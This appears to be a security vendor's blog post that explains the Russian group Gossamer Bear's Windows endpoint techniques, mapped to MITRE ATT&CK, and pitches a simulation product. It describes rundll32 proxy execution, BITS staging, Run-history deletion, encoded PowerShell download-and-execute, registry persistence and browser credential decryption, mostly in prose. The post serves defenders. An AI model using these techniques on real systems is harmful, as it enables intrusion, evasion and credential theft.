Gossamer Bear APT: Windows Endpoint Campaign Explained

Gossamer Bear (also tracked as Callisto, Blue Charlie, Star Blizzard, COLDRIVER, and TA446) is a Russian state-sponsored threat group associated with the FSB’s 18th Center. Active since at least 2016, it conducts cyber-espionage campaigns targeting government, defense, academic, and policy organizations across NATO member states, the US, and Ukraine. 

Gossamer Bear is best known for highly tailored spear-phishing operations that harvest credentials through fake login portals and malicious domains. The group maintains long-term access for intelligence collection and occasionally conducts hack-and-leak operations to influence public narratives. Its activities demonstrate a strong alignment with Russian geopolitical interests, making it a persistent and sophisticated adversary focused on strategic espionage rather than financial gain.

In this blog, we are going to examine the Goosamer Bear’s Windows endpoint campaign, mapped to MITRE ATT&CK framework.

Defense Evasion

T1218.011 - System Binary Proxy Execution: Rundll32 

Executing a DLL via Rundll32

Goal: Gossamer Bear loads a malicious DLL with rundll32.exe to run code while blending with a trusted OS binary.

Method: Drop the DLL to a writable folder (e.g., %TMP%) and invoke it with rundll32, calling a specific exported function to execute the payload.

How it hides
• Runs under a signed Windows binary, avoiding simple allowlists.
• No obvious EXE on disk — logic executes inside the DLL.
• Can be concealed by a proxy parent (e.g., winver.exe), muddying process lineage.

How Does Picus Help?

Picus SCV runs the same sequence to validate whether endpoint controls and telemetry detect DLL injection via rundll32 and whether parent-child process chains are visible to defenders.

Payload explanation

• Process 1 — rundll32 calls the attacker DLL and its exported function.
• Process 2 — a benign proxy parent (e.g., winver.exe) obscures the rundll32 launch.

The sequence mimics dropping a DLL to a writable location and executing it via a trusted system binary to test detection of proxy execution and fileless DLL techniques.

T1197 - BITS Jobs

Executing Bitsadmin Command 

Goal: Gossamer Bear uses BITS jobs to quietly download and stage payloads via a trusted Windows utility.

Method: Create a BITS job, copy/rename bitsadmin.exe into %TMP%, and stage files there for later execution.

Why it works for the attacker

• Trusted binary — signed, often allowed.
• Resilient transfer — jobs survive reboots and network drops.
• Post-transfer execution — can run a program when the job completes.

How Does Picus Help?

The Picus SCV module runs the same sequence to validate whether endpoint controls, monitoring, and detection rules catch registry, file and process activity associated with BITS job abuse. This verifies if security controls flag renamed LOTL binaries, unusual copies to %TMP%, or BITS job creation and execution.

Payload explanation

• Process 1 creates a BITS job named test.
• Process 2 places a trusted utility in %TMP% under a benign name to reduce suspicion and avoid blocking by allowlists.
• Process 3 uses the copied binary to stage a file in %TMP% using a legitimate source path and a local target path. A follow-up command such as /setpriority and /resume or /transfer initiates the actual download and completion trigger.

The sequence mimics an attacker using a signed, living off the land binary to perform resilient downloads and to stage or execute payloads while minimizing noisy telemetry and file artifacts.

T1070.001 - Indicator Removal: Clear Windows Event Logs

Deleting All Run Command Logs via RunMRU Registry Key

Goal: Gossamer Bear targets the RunMRU registry key to erase entries from the Windows Run dialog history (Win+R), removing a key source of forensic evidence about commands that were executed.

Method: The actor uses the native reg.exe utility to manipulate registry entries. By first ensuring the key exists and then force-deleting it, the adversary quickly removes command-history artifacts that investigators rely on to reconstruct activity.

How it hides
• Uses a trusted, signed system binary (reg.exe), blending with normal admin activity.
• Operates at the registry level, leaving no file artifacts and minimizing noisy telemetry.

How Does Picus Help?

The Picus SCV module runs the same sequence to validate detection and response coverage for registry-based evidence removal. It demonstrates how an attacker can erase Run history and verifies whether logging/alerting catches the behavior.

Payload explanation

• Process 1 writes a value to RunMRU so the key and expected structure exist for the follow-up delete.
• Process 2 invokes reg.exe with /f to force immediate deletion without prompts.

The sequence mimics rapid, trusted-binary cleanup of command-history evidence, testing whether endpoint and SIEM controls detect or retain sufficient telemetry for post-incident investigation.

Execution

T1059.001 - Command and Scripting Interpreter: PowerShell

Executing Encoded Powershell Command

Goal: Gossamer Bear issues a single obfuscated command that downloads an encoded PowerShell payload from a remote host and runs it directly in memory to evade signature-based detection.

Method: The actor abuses PowerShell as a living-off-the-land tool to fetch and execute code without ever writing the final payload to disk, achieving a fileless execution path.

How it hides: The payload is delivered as a Base64-encoded string and executed with flags that suppress any visible window, minimizing artifacts and user visibility.

How Does Picus Help?

Payload explanation

• Downloads a Base64-encoded next-stage payload from a remote host into memory.
• Immediately decodes and executes that payload in-memory (no final file is written).
• Uses single-line obfuscation and suppressed UI to reduce observable artifacts and blunt simple signature or user-based detection.

This safely mimics Gossamer Bear performing multi-stage, fileless code execution where the malicious logic is obscured by both network delivery and Base64 encoding.

Requesting a URL using Powershell Web Request

Goal: Gossamer Bear uses PowerShell’s built-in web request feature to contact a remote server and download external content or payloads directly into memory.

Method: Leverage Invoke-WebRequest to fetch remote files or scripts over HTTP(S) using native PowerShell functionality, eliminating the need for external utilities.

How it hides

• Uses a trusted Windows binary (powershell.exe) already present on the system.
• Transfers data over standard web protocols, blending with normal network traffic.
• Can download and execute payloads without saving them to disk.

How Does Picus Help?

Picus SCV runs the same PowerShell command to confirm whether endpoint and network controls detect outbound connections and remote file retrievals initiated via PowerShell.

Payload explanation

• Sends a web request to %remotefile-11085%, retrieving remote content using Invoke-WebRequest.
• Demonstrates how attackers can use native PowerShell networking to download or stage payloads without external tools.
• Safely replicates an ingress transfer technique to validate network monitoring and script execution detection.

Persistence 

T1543 - Create or Modify System Process

Creating a New Scheduled Task by using COM TaskScheduler Class

Goal: Gossamer Bear drops and runs a script that registers a new scheduled task to achieve persistence.

Method: Place a script in a writable location (e.g., %TMP%) and execute it with PowerShell; the script uses the TaskScheduler COM API to create a task that runs on a schedule or at logon.

How it hides

• Persists via a legitimate Windows scheduling mechanism.
• Task runs under normal system/user context, blending with legitimate scheduled tasks.
• No obvious one-off process; activity appears as routine task registration.

How Does Picus Help?

Picus SCV executes the same script-and-register pattern to verify whether endpoint controls, scheduled-task monitoring, and change-logging detect the new task.

Payload explanation

• Runs the dropped PowerShell script which calls the TaskScheduler COM class to create a scheduled task that will execute on a trigger (e.g., logon or time).
• Mimics an attacker achieving durable persistence through a legitimate scheduling API while minimizing noisy process activity and file artifacts.

T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Creating a New Registry Key "System Health Check" in HKLM Hive

Goal: Gossamer Bear adds a registry Run key so a payload launches automatically at boot or user logon.

Method: Write an autorun entry to the HKLM Run hive that points to a signed or trusted binary invoked with a crafted argument to execute attacker-controlled code.

How it hides

• Uses registry autorun — a common, legitimate autostart method.
• Points to a system binary (cmstp.exe) to blend with normal activity.
• Uses an INF/installer argument to run silently, reducing visible prompts.

How Does Picus Help?

Picus SCV writes the same Run-key entry to validate detection of registry persistence and whether execution via a trusted helper binary is captured by endpoint and SIEM controls.

Payload explanation

• Creates the SystemHealthCheck Run value that launches cmstp.exe with an INF file argument at boot/logon.
• Simulates an attacker achieving persistent execution by chaining a trusted OS binary with a crafted installer file, testing whether persistence via registry autorun and helper-binary invocation is detected.

Discovery

T1217 - Browser Information Discovery

Enumerating Installed Browsers via Registry Keys

Goal: Gossamer Bear identifies which browsers are installed to target browser-specific TTPs (extensions, profiles, or credential theft).

Method: Query browser-related registry keys (or run a small enumerator) to list installed browsers and versions.

How Does Picus Help?

Payload explanation

• Executes a small tool that reads browser-related registry keys and reports installed browsers and versions.
• Simulates an attacker inventorying browser targets to plan follow-on collection or exploit activity.

Gathering Browser Bookmark using Powershell Script

Goal: Gossamer Bear harvests browser bookmarks and profile data to locate saved URLs, SSO flows, and high-value targets for credential/session collection.

Method: Relax local PowerShell execution policy, import a collection module from %TMP%, and extract bookmark/profile artifacts for the targeted browser.

How Does Picus Help?

Picus SCV runs the same PowerShell sequence to verify whether script execution, module imports, and filesystem/registry reads used for browser data collection are detected and logged.

Payload explanation

• Process 1 — temporarily relaxes execution policy to permit running the collection script.
• Process 2 — imports the local PowerShell module and runs a function that extracts bookmarks/profile data from the specified browser.

This mimics Gossamer Bear harvesting browser artifacts for reconnaissance and credential/session harvesting, testing detection of scripted collection and local data access.

T1083 - File and Directory Discovery

Finding Files with Specific Extensions

Goal: Gossamer Bear searches the filesystem for documents and office files to locate sensitive data for exfiltration or privilege escalation.

Method: Run a recursive file search for common document extensions across drives to build an inventory of candidate files.

How Does Picus Help?

Picus SCV executes the same search to validate whether endpoint and file-monitoring controls detect broad recursive enumeration and suspicious mass-file queries.

Payload explanation

• Iterates common document extensions and lists matching file paths across the C: drive, producing an inventory of potentially sensitive files.

The sequence mimics Gossamer Bear performing wide-scale file discovery to identify exfiltration targets or files useful for lateral movement, testing whether file-access monitoring and DLP telemetry surface mass enumeration.

T1087 - Account Discovery

Listing Domain Accounts Using "net user /domain" Command

Goal: Gossamer Bear enumerates domain user accounts to map targets and identify high-value principals.

Method: Use the native net utility to request a list of domain accounts from a joined host or domain controller.

How Does Picus Help?

Payload explanation

• It invokes the Windows Net API to retrieve domain user account listings, producing a concise inventory of usernames and basic account metadata.

This mimics attacker reconnaissance to discover valid accounts for lateral movement, privilege escalation, or targeted credential attacks, testing detection of domain-level enumeration.

Displaying Detailed Configuration Information about a Computer Using "systeminfo"

Goal: Gossamer Bear captures a machine’s inventory (OS build, patch levels, hotfixes, network adapters, domain membership) to profile hosts and select follow-on TTPs.

Method: Run the native systeminfo.exe utility to dump comprehensive system configuration and patch/role details.

How Does Picus Help?

Picus SCV executes the same command to verify whether endpoint telemetry, asset inventory systems, and SIEM ingest this output for detection and context enrichment.

Payload explanation

• It outputs OS version/build, installed hotfixes, boot/timezone info, network adapters, domain/workgroup, and other host metadata.

This gives an attacker the environment context needed for exploit selection and lateral movement, and tests whether such profiling is captured and correlated by defenders.

T1016.001 - System Network Configuration Discovery: Internet Connection Discovery

Displaying All Current TCP/IP Network Configuration Using "ipconfig /all " Command

Goal: Gossamer Bear collects detailed network configuration to map interfaces, IPs, gateways, DNS servers, and routing info useful for lateral movement and reconnaissance.

Method: Run the native ipconfig utility to dump the host’s complete TCP/IP settings.

How Does Picus Help?

Picus SCV runs the same command to verify whether endpoint and network telemetry capture network-inventory queries and surface them for detection or correlation.

Payload explanation

• It prints adapter names, IPv4/IPv6 addresses, MACs, DHCP/DNS settings, default gateway, lease info, and connection-specific DNS suffixes.

This output gives an attacker the network topology and routing details needed to plan lateral movement, pivoting, or identify exposed services,  and tests whether such enumeration is logged and flagged by defenders.

T1049 - System Network Connections Discovery

Displaying Active TCP Connections Using "Netstat" with -nao Parameters

Goal: Gossamer Bear enumerates active network connections and associated PIDs to identify remote hosts, listening services, and potential command-and-control channels.

Method: Run netstat to list all TCP/UDP sockets, their states, remote endpoints, and owning process IDs.

How Does Picus Help?

Picus SCV runs the same command to verify whether network-connection enumeration is captured by endpoint and network telemetry and correlated with process context.

Payload explanation

• It outputs local/remote IP:port pairs, connection states, and owning PIDs.

This gives an attacker a map of current network activity and which processes own sockets, aiding identification of C2, lateral pivots, or exposed services, and tests whether defenders link connections to processes for detection.

T1033 - System Owner/User Discovery

Displaying the All Domain and User Name Using "whoami /all"

Goal: Gossamer Bear collects account and privilege information to find high-privilege contexts and usable credentials.

Method: Invoke whoami to return current user, group membership, and privilege/token details.

How Does Picus Help?

Picus SCV runs the same command to confirm whether account/context enumeration is logged and whether telemetry exposes privilege-escalation opportunities.

Payload explanation

• It prints the current account, SIDs, group memberships, and enabled privileges.

This reveals whether the process runs with elevated rights or membership in sensitive groups, helping attackers choose escalation or lateral-movement paths, and validates detection of privilege-context queries.

T1057 - Process Discovery

Displaying a List of Applications and Services Using "tasklist /v"

Goal: Gossamer Bear inventories running applications and services to identify interesting processes (AV, browsers, mail clients) and candidate parents for process-hiding or injection.

Method: Use tasklist to produce a verbose process list including PID, session, memory, and window title.

How Does Picus Help?

Picus SCV executes the same command to ensure process-enumeration telemetry is collected and that defenders can correlate process listings with suspicious activity.

Payload explanation

• It outputs process names, PIDs, session IDs, memory usage, and window titles.

This helps an attacker spot security products, user apps with credentials/sessions, or processes suitable for proxying or injection, and tests whether process-enumeration is visible to monitoring tools.

Credential Access

T1555.003 - Credentials from Password Stores: Credentials from Web Browsers

Gathering Browser Credentials via Chrome App-Bound Encryption (ABE) Decryption Tool

Goal: Gossamer Bear runs a local App-Bound Encryption (ABE) decryption utility to extract saved credentials from a browser (Edge/Chrome) profile.

Method: Execute a tool from a writable location that calls the browser’s encryption/decryption APIs or local key material to decrypt and dump stored logins, cookies, and session tokens.

How it hides
• Runs in the current user context (no elevation required), reducing telemetry noise.
• Uses native browser crypto/APIs and local profile files rather than brute-force methods.
• Executes from a benign-looking path (%TMP%), blending with normal user-launched tooling.

How Does Picus Help?

Picus SCV runs the same ABE decryption flow to validate whether endpoint, file-access, and process-monitoring controls detect local credential access, profile file reads, and suspicious decryption activity.

Payload explanation

• The tool accesses the browser profile, uses local encryption keys/APIs to decrypt stored credentials, and exports saved logins, cookies, or session tokens for collection.

The sequence simulates an attacker harvesting browser-stored credentials to support lateral movement or account takeover and tests whether defenders log and alert on local credential-exfiltration behavior.

How Picus Helps Defend Against Gossamer Bear APT Attacks?

The Picus Security Validation Platform safely simulates Gossamer Bear Windows endpoint campaigns, replicating the malware’s new plug-in functionality for validation purposes. Through the Picus Threat Library, it replicates the tactics, techniques, and procedures (TTPs) observed in these campaigns to reveal detection and prevention gaps across EDR, NGFW, and SIEM technologies, before adversaries can exploit them.

You can also test your defenses against hundreds of other malware variants, such as Salt Typhoon APT, APT28, Lazarus APT, within minutes with a 14-day free trial of the Picus Platform.

Key Takeaways